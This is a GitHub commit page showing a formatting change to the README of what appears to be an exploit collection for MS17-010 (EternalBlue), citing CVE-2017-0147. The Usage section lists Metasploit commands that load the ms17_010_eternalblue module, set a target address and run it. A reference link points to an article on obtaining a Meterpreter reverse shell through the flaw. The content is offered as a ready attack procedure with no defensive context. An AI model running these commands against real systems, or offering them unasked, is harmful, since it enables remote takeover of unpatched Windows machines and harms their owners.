We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
1 parent 1b7ff5f commit 17fbe61Copy full SHA for 17fbe61
MS17-010/README.md
@@ -12,10 +12,11 @@ Vulnerability reference:
12
* [CVE-2017-0147](http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147)
13
14
## Usage
15
+```
16
msf > use exploit/windows/smb/ms17_010_eternalblue
17
msf exploit(ms17_010_eternalblue) > set rhost 10.10.1.13
18
msf exploit(ms17_010_eternalblue) > run
-
19
20
21
## References
22
* [Windows2012上如何通过攻击ETERNALBLUE获得Meterpreter反弹](https://mp.weixin.qq.com/s?__biz=MzI5MzY2MzM0Mw%3D%3D&mid=2247483946&idx=1&sn=cbe2e5a08470d699daeb74d7904581c7&scene=45#wechat_redirect)
0 commit comments